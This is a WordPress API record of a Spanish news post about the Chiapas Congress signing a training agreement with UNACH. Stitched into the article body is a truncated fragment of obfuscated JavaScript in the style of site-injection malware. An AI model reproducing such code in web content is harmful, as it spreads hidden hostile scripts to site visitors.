{"id":8672,"date":"2023-02-14T04:05:05","date_gmt":"2023-02-14T04:05:05","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8672"},"modified":"2023-02-14T04:05:06","modified_gmt":"2023-02-14T04:05:06","slug":"congreso-del-estado-firma-convenio-con-la-unach","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8672","title":{"rendered":"Congreso del Estado firma convenio con la UNACH"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/IMG-20230213-WA0059.jpg\" alt=\"\" class=\"wp-image-8673\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/IMG-20230213-WA0059.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/IMG-20230213-WA0059-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/IMG-20230213-WA0059-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/IMG-20230213-WA0059-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Este tipo de acuerdos, permitir\u00e1n la capacitaci\u00f3n, actualizaci\u00f3n, y la formaci\u00f3n continua del personal del Poder Legislativo.<\/p>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, Chiapas a 13 de febrero de 2023.- La diputada Sonia Catalina \u00c1lvarez presidenta de la Mesa Directiva en el Congreso del Estado de Chiapas firm\u00f3 convenio de colaboraci\u00f3n con la Universidad Aut\u00f3noma de Chiapas que encabeza el rector Carlos Faustino Natar\u00e9n Nandayapa, con el objetivo de unificar esfuerzos para promover, desarrollar, organizar e implementar de manera conjunta actividades educativas.<br>Durante el acto protocolario, el cual fue propuesto por el diputado Ra\u00fal Bonifaz Moedano, particip\u00f3 de manera activa y de forma integral del mismo, el diputado Yamil Melgar Bravo, presidente de la Junta de Coordinaci\u00f3n Pol\u00edtica.<br>Este tipo de acciones -refiere en la Iniciativa Bonifaz Moedano- fortalecen la misi\u00f3n de las partes y permitir\u00e1n consolidar una cultura pol\u00edtica y acad\u00e9mica de la ciudadan\u00eda.<br>Con ello, ratific\u00f3 la diputada Sonia Catalina \u00c1lvarez, el personal del Congreso continuar\u00e1 su proceso de capacitaci\u00f3n, actualizaci\u00f3n, formaci\u00f3n continua, dise\u00f1adas para los intereses del propio trabajador, las cuales deben tener relaci\u00f3n con la actividad legislativa.<br>Al respecto, el rector de la m\u00e1xima casa de estudios, Carlos Natar\u00e9n Nandayapa, sostuvo que el acuerdo suscrito tiene por objeto incidir en el desarrollo de Chiapas y de la Naci\u00f3n, particularmente de la regi\u00f3n sur-sureste del pa\u00eds, as\u00ed como de Centroam\u00e9rica, a trav\u00e9s de la ense\u00f1anza de la educaci\u00f3n superior, de la investigaci\u00f3n, de la construcci\u00f3n, extensi\u00f3n y socializaci\u00f3n del conocimiento y la cultura, por medio de la formaci\u00f3n y actualizaci\u00f3n de t\u00e9cnicos, profesionistas, profesores e investigadores con compromiso social que permita coadyuvar en el desarrollo social, econ\u00f3mico, pol\u00edtico y cultural.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Este tipo de acuerdos, permitir\u00e1n la capacitaci\u00f3n, actualizaci\u00f3n, y la formaci\u00f3n continua del personal del Poder Legislativo. Tuxtla Guti\u00e9rrez, Chiapas a 13 de febrero de 2023.- La diputada Sonia Catalina \u00c1lvarez presidenta de la Mesa Directiva en el Congreso del Estado de Chiapas firm\u00f3 convenio de colaboraci\u00f3n con la Universidad Aut\u00f3noma de Chiapas que encabeza &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8673,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-8672","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8672","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8672"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8672\/revisions"}],"predecessor-version":[{"id":8674,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8672\/revisions\/8674"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8673"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8672"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8672"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8672"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}